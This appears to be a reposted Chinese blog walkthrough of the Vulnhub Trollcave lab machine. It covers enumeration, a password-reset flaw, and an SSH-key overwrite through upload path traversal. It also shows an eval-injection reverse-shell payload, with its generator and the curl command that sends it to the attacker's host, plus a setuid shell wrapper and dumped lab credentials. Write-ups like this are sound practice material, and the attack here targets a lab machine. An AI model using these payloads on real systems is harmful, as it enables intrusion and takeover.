【Vulnhub】靶机TROLLCAVE

admin 2022年1月10日03:33:42安全博客评论14 views15180字阅读50分36秒阅读模式

前言

  • Vulnhub刷题简单记录

TROLLCAVE

描述

Trollcave是一个易受攻击的虚拟机,具有Vulnhub的传统和一般的信息安全兵棋推演。你从一个你一无所知的虚拟机开始——没有用户名,没有密码,只有你可以在网络上看到的。在这种情况下,您将看到一个包含大量用户的简单社区博客网站。从这个初始点开始,您枚举机器正在运行的服务和一般特征,并设计出通过查找和利用漏洞和错误配置来完全控制它的方法。

你的第一个目标是滥用机器上的服务来获得未经授权的 shell 访问。您的最终目标是读取root用户主目录中的文本文件root/flag.txt)。

此 VM 设计为整体且相当实用。我想模拟对真实网站的真实攻击,而不仅仅是呈现一个由不同元素组成的拼图框,并且我想避免更深奥的易受攻击的 VMisms,例如当您必须对发现端口的 MP3 进行信号处理时- 敲门顺序。当然,在现实和最有趣/具有挑战性的事物之间总是要权衡利弊,但我试图让挑战保持扎根。

因为这是您要下载、导入和启动的 VM,所以实现此目标的一种方法是挂载 VM 的硬盘。我没有加密磁盘或采取任何措施来防止这种情况发生,所以如果你想走那条路,继续吧。我也不会为完成这个 VM 提供奖品或任何东西,所以要知道这完全没有意义。

因为这是一个运行具有真实服务的真实操作系统的虚拟机,所以可能有一些方法可以达到root我不想要的。理想情况下,这应该是乐趣的一部分,但如果它们使盒子变得微不足道,我想了解并修复它们 - 在合理范围内。在此版本中,我已经安装了适用于 Ubuntu Server 16.04 LTS 的所有更新,但我不能也不会尝试针对未来出现的每个新 Linux 内核漏洞修补此 VM。所以有一个提示——你不必使用内核漏洞来根这个框。

你需要一个好的 HTTP 拦截代理——我推荐Burpsuite——以及一些网络工具,比如nmapnc。您还需要一些虚拟化软件——VirtualBox对大多数人来说是最简单的,但 KVM 和 VMWare 也应该能够.ova在稍微摆弄之后导入文件。导入 VM 后,将其与攻击系统放在同一网络上(最好不要让其访问 Internet)并开始黑客攻击!

您可以在.ova此处获取文件 ( 929MB )(2018 年 3 月 19 日更新)。让我知道你的想法

不适用于 VMware。更新日志 v1.1 - 19/03/2018 v1.2 - 21/03/2018

靶机的地址:https://www.vulnhub.com/entry/trollcave-12,230/

Trollcave开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
4
5
6
gobuster dir -u http://192.168.1.104/password_resets -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/password_resets

接着扫出任意重置密码了目录了
http://192.168.1.104/password_resets/new

4、通过改get参数,来改king的密码

1
http://192.168.1.104/password_resets/edit.aSp4X7kLnpkxOH4xu4Nyug?name=King

5、登陆上去之后有个文件上传,我们打开一下enable,然后再上传,因为是ruby语言写的,所以木马没用,我们只能靠提示的tails,猜测有tails用户,然后通过nmap确定有rsa加密登陆,所以用文件上传来覆盖/home/rails/.ssh/authorized_keys,最后登陆,下面展示命令

1
2
3
4
5
ssh-keygen -f rails  #伪造sha256
mv rails.pub authorized_keys #重命名
通过目录穿越,将其上传到../../../../../../home/rails/.ssh/authorized_keys
mv rails id_rsa-rails #重命名
ssh -i id_rsa-rails [email protected] #无密码连接

6、提权的方法,这个靶机中

1、首先,信息收集,在网站目录发现config中数据库的信息

1
2
3
4
5
6
7
8
production:
adapter: postgresql
encoding: unicode
database: trollcave
pool: 5
host: localhost
username: tc
password: sowvillagedinnermoment

2、接着尝试用sqlite3读取数据库文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
sqlite> select * from private_messages
...> ;
1|password|
use it sparingly

uFrrK3dXzWeZQ7JtGgZk4FT

do NOT share it
|1|3|2017-09-29 14:03:24.494241|2017-09-29 14:03:24.494241
sqlite> .tables
admin_settings comments reports user_files
blogs private_messages schema_migrations users
sqlite> select * from users;
1|King|[email protected]|:)|$2a$10$tHX6EGkwuapTRY1/7R/meuVPLUT8Tkooh0M6WpQpGKOSSwuuc.7C.||5|0|||2017-09-29 14:03:23.339227|2017-09-29 14:03:23.339227|||
2|dave|[email protected]|nah lol|$2a$10$DpHp4ikbNnq/43uhbjWJcee9lTLDTTx2ndtSl99m81wDSvNBuztiS||4|0|||2017-09-29 14:03:23.414352|2017-09-29 14:03:23.414352|||
3|dragon|[email protected]|Over fire and over stone / Over water and over bone / Shining out like jewels of light / On a sheet of purest night|$2a$10$XmozUYK/xikEb7CktLCer.LXwXYFDzISlCNGKGh8sxyqy7OunCdFS||4|0|||2017-09-29 14:03:23.484532|2017-09-29 14:03:23.484532|||
4|coderguy|[email protected]|;)|$2a$10$XVAiu4/71LV.2JA5e6UZr.BEIvSpAI0Wt8YqKU0FOdcKwcQIAppLO||4|0|||2017-09-29 14:03:23.550390|2017-09-29 14:03:23.550390|||
5|cooldude89|[email protected]|i am the dankest|$2a$10$HR0yIsnfKaSG07Kge5Z7K.Ki7dthW3IqQ0PYd/ZS3rA.KFjWv92z.||3|0|||2017-09-29 14:03:23.616162|2017-09-29 14:03:23.616162|||
6|Sir|[email protected]|It's super secure|$2a$10$tYaFo0fGxFreOdFBy3ch5ej/UrznlUQBcM8l7il0Zx25ca6as/xza||3|0|||2017-09-29 14:03:23.682157|2017-09-29 14:03:23.682157|||
7|Q|[email protected]|Your normal password|$2a$10$gTZ1kX5xHLp0JT78n.UMeeAd789/5h1p8Ox4L2e4rCIVPImb6vOfu||3|0|||2017-09-29 14:03:23.753882|2017-09-29 14:03:23.753882|||
8|teflon|[email protected]|swordfish|$2a$10$F5Ajt2HI.7xshVrHJqZy6.Iv2myLqDJwgyzBDogDe79WlDdIrsBDO||3|0|||2017-09-29 14:03:23.819291|2017-09-29 14:03:23.819291|||
9|TheDankMan|[email protected]|420|$2a$10$bbI2A71mL5pcCtY/mB4nIeQzxi4z6/c/K/0RpurZMMfBn4I7JGGlm||2|0|||2017-09-29 14:03:23.884605|2017-09-29 14:03:23.884605|||
10|artemus|[email protected]|garden|$2a$10$x/L0IWKs29nrN9qOVisPzeIJIrBaZfCMXWJdco6DUtZlGMOAuWrmO||2|0|||2017-09-29 14:03:23.950848|2017-09-29 14:03:23.950848|||
11|MrPotatoHead|[email protected]|you know...|$2a$10$AmuZ8ccJ4r3kaAc13ycjTezsAbvtF66lNkq2R7tXmLNWuf8U12sLG||2|0|||2017-09-29 14:03:24.016908|2017-09-29 14:03:24.016908|||
12|Ian|[email protected]|a|$2a$10$InZ5.qJvFkgZX76xw8ZqGekxhwmvGCaRNBqU0rroOqG4RRuSZsXFK||2|0|||2017-09-29 14:03:24.082082|2017-09-29 14:03:24.082082|||
13|kev|[email protected]|mother's maiden name|$2a$10$D13SoP5GCHC6RkIBOQSXKuQf9E9h5Mo1evGZJa9p23xzUSkfugj7S||1|0|||2017-09-29 14:03:24.149092|2017-09-29 14:03:24.149092|||
14|notanother|[email protected]|(:|$2a$10$PYqCCOIop.NRMWm13ue26eEkc/ZR/7rDCOpiN5.9rkZ7/GSUcJ8rC||1|0|||2017-09-29 14:03:24.215992|2017-09-29 14:03:24.215992|||
15|anybodyhome|[email protected]|no one is|$2a$10$Dc1Q8NufJ/oEZLeIxFWASOT4Kj4/WHzmTNUaD6U9omBtKapLJFKse||1|0|||2017-09-29 14:03:24.282237|2017-09-29 14:03:24.282237|||
16|onlyme|[email protected]|It is what it is|$2a$10$X4DKSco.clov.ro0pcN.nO1DYa3V/PRAQq6oOQCb/TW.MJyaHqSnW||1|0|||2017-09-29 14:03:24.348750|2017-09-29 14:03:24.348750|||
17|xer|[email protected]|fave pronoun|$2a$10$rjjHGOYhobwzMPysTjd0k.OWH4x/FlnCtIv6VjPstLR3RWYOSHyQ6||1|0|||2017-09-29 14:03:24.414057|2017-09-29 14:03:24.414057|||

接着尝试连接5432的ptl数据库,因为kali无法访问,所以需要将端口转发出来

快键键 shift+波浪号(~)+C

3、就可以进入ssh模式,来进行端口转发,输入命令

1
ssh> -L 5432:localhost:5432

image-20210925222928014

本地可以查看,是否成功

image-20210925223031477

4、利用dbeaver这个软件来进行连接postgreSQL,密码就是我们刚刚收集的,并没有发现有用信息

image-20210925223212387

5、用同样的方法,将8888端口转到本地访问一下,发现有一个calc的关键字,搜索一下calc看看

image-20210926044716522

1
find / -iname calc 2>/dev/null

接着发现King目录下有一个calc.js脚本,发现其可以被命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
var http = require("http");
var url = require("url");
var sys = require('sys');
var exec = require('child_process').exec;

// Start server
function start(route)
{
function onRequest(request, response)
{
var theurl = url.parse(request.url);
var pathname = theurl.pathname;
var query = theurl.query;
console.log("Request for " + pathname + query + " received.");
route(pathname, request, query, response);
}

http.createServer(onRequest).listen(8888, '127.0.0.1');
console.log("Server started");
}

// Route request
function route(pathname, request, query, response)
{
console.log("About to route request for " + pathname);
switch (pathname)
{
// security risk
/*case "/ping":
pingit(pathname, request, query, response);
break; */

case "/":
home(pathname, request, query, response);
break;

case "/calc":
calc(pathname, request, query, response);
break;

default:
console.log("404");
display_404(pathname, request, response);
break;
}
}

function home(pathname, request, query, response)
{
response.end("<h1>The King's Calculator</h1>" +
"<p>Enter your calculation below:</p>" +
"<form action='/calc' method='get'>" +
"<input type='text' name='sum' value='1+1'>" +
"<input type='submit' value='Calculate!'>" +
"</form>" +
"<hr style='margin-top:50%'>" +
"<small><i>Powered by node.js</i></small>"
);
}

function calc(pathname, request, query, response)
{
sum = query.split('=')[1];
console.log(sum)
response.writeHead(200, {"Content-Type": "text/plain"});

response.end(eval(sum).toString());
}

function ping(pathname, request, query, response)
{
ip = query.split('=')[1];
console.log(ip)
response.writeHead(200, {"Content-Type": "text/plain"});

exec("ping -c4 " + ip, function(err, stdout, stderr) {
response.end(stdout);
});
}

function display_404(pathname, request, response)
{
response.write("<h1>404 Not Found</h1>");
response.end("I don't have that page, sorry!");
}

// Start the server and route the requests
start(route);

方法一

①在tmp目录中创建一个exp.c文件,写入获取king的shell的命令

1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char *argv[])
{
setreuid(1000,1000);
execve("/bin/bash",NULL,NULL);
}

gcc编译为exp

1
gcc exp.c -o exp

②在tmp目录中创建一个1.sh的执行文件,内容为

1
2
3
4
#!/bin/sh

cp /tmp/exp /tmp/exp-test
chmod 4777 /tmp/exp-test

利用burp抓包,在8888端口的calc中的sum直接执行命令,来执行1.sh使用king的权限

image-20210926053459005

接着就获得了一个king的权限,并且任意用户都能使用的exp

image-20210926053537551

③root的权限

image-20210926053634293

方法二

①利用网上找到的一个payload生成命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/python
import sys

if len(sys.argv) != 3:
print "Usage: %s " % (sys.argv[0])
sys.exit(0)

IP_ADDR = sys.argv[1]
PORT = sys.argv[2]

def charencode(string):
"""String.CharCode"""
encoded = ''
for char in string:
encoded = encoded + "," + str(ord(char))
return encoded[1:]

print "[+] LHOST = %s" % (IP_ADDR)
print "[+] LPORT = %s" % (PORT)
NODEJS_REV_SHELL = '''(function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(%s, "%s", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();1+1;''' % (PORT, IP_ADDR)
print "[+] Encoding"
PAYLOAD = charencode(NODEJS_REV_SHELL)
print "eval(String.fromCharCode(%s))" % (PAYLOAD)

②、接着利用这个脚本生成命令shell

image-20210922160137541

1
2
3
4
5
6
┌──(root💀kali)-[~/BC/trollcave]
└─# python exp.py 192.168.1.102 1234
[+] LHOST = 192.168.1.102
[+] LPORT = 1234
[+] Encoding
eval(String.fromCharCode(40,102,117,110,99,116,105,111,110,40,41,123,32,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,32,105,102,32,40,33,114,101,113,117,105,114,101,41,32,114,101,116,117,114,110,59,32,118,97,114,32,99,109,100,32,61,32,40,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,109,97,116,99,104,40,47,94,119,105,110,47,105,41,41,32,63,32,34,99,109,100,34,32,58,32,34,47,98,105,110,47,115,104,34,59,32,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,34,110,101,116,34,41,44,32,99,112,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,44,32,117,116,105,108,32,61,32,114,101,113,117,105,114,101,40,34,117,116,105,108,34,41,44,32,115,104,32,61,32,99,112,46,115,112,97,119,110,40,99,109,100,44,32,91,93,41,59,32,118,97,114,32,99,108,105,101,110,116,32,61,32,116,104,105,115,59,32,118,97,114,32,99,111,117,110,116,101,114,61,48,59,32,102,117,110,99,116,105,111,110,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,32,61,32,110,101,116,46,99,111,110,110,101,99,116,40,49,50,51,52,44,32,34,49,57,50,46,49,54,56,46,49,46,49,48,50,34,44,32,102,117,110,99,116,105,111,110,40,41,32,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,32,105,102,32,40,116,121,112,101,111,102,32,117,116,105,108,46,112,117,109,112,32,61,61,61,32,34,117,110,100,101,102,105,110,101,100,34,41,32,123,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,101,108,115,101,32,123,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,111,117,116,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,101,114,114,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,125,41,59,32,115,111,99,107,101,116,46,111,110,40,34,101,114,114,111,114,34,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,41,32,123,32,99,111,117,110,116,101,114,43,43,59,32,105,102,40,99,111,117,110,116,101,114,60,61,32,49,48,41,123,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,125,44,32,53,42,49,48,48,48,41,59,32,125,32,101,108,115,101,32,112,114,111,99,101,115,115,46,101,120,105,116,40,41,59,32,125,41,59,32,125,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,32,125,41,40,41,59,49,43,49,59))

③、接着在ssh刚连接的用户中执行下面命令,并且同时本机监听1234端口用nc

image-20210922160228344

1
curl 'http://127.0.0.1:8888/calc?sum=eval(String.fromCharCode(40,102,117,110,99,116,105,111,110,40,41,123,32,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,32,105,102,32,40,33,114,101,113,117,105,114,101,41,32,114,101,116,117,114,110,59,32,118,97,114,32,99,109,100,32,61,32,40,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,109,97,116,99,104,40,47,94,119,105,110,47,105,41,41,32,63,32,34,99,109,100,34,32,58,32,34,47,98,105,110,47,115,104,34,59,32,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,34,110,101,116,34,41,44,32,99,112,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,44,32,117,116,105,108,32,61,32,114,101,113,117,105,114,101,40,34,117,116,105,108,34,41,44,32,115,104,32,61,32,99,112,46,115,112,97,119,110,40,99,109,100,44,32,91,93,41,59,32,118,97,114,32,99,108,105,101,110,116,32,61,32,116,104,105,115,59,32,118,97,114,32,99,111,117,110,116,101,114,61,48,59,32,102,117,110,99,116,105,111,110,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,32,61,32,110,101,116,46,99,111,110,110,101,99,116,40,49,50,51,52,44,32,34,49,57,50,46,49,54,56,46,49,51,54,46,49,51,52,34,44,32,102,117,110,99,116,105,111,110,40,41,32,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,32,105,102,32,40,116,121,112,101,111,102,32,117,116,105,108,46,112,117,109,112,32,61,61,61,32,34,117,110,100,101,102,105,110,101,100,34,41,32,123,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,101,108,115,101,32,123,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,111,117,116,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,101,114,114,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,125,41,59,32,115,111,99,107,101,116,46,111,110,40,34,101,114,114,111,114,34,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,41,32,123,32,99,111,117,110,116,101,114,43,43,59,32,105,102,40,99,111,117,110,116,101,114,60,61,32,49,48,41,123,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,125,44,32,53,42,49,48,48,48,41,59,32,125,32,101,108,115,101,32,112,114,111,99,101,115,115,46,101,120,105,116,40,41,59,32,125,41,59,32,125,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,32,125,41,40,41,59,49,43,49,59))'

image-20210922160353371

就可以得到一个shell,并且可以用sudo bash提权无需密码

image-20210922160449644

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Vulnhub】靶机TROLLCAVE http://cn-sec.com/archives/730026.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: